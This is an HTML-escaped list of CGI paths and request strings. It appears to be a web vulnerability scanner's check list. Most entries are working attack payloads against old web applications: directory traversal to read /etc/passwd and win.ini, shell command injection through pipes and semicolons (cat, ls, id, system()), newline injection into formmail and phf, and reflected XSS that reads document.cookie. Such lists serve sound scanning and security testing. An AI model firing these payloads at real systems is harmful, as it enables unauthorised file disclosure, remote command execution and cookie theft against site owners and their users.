Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
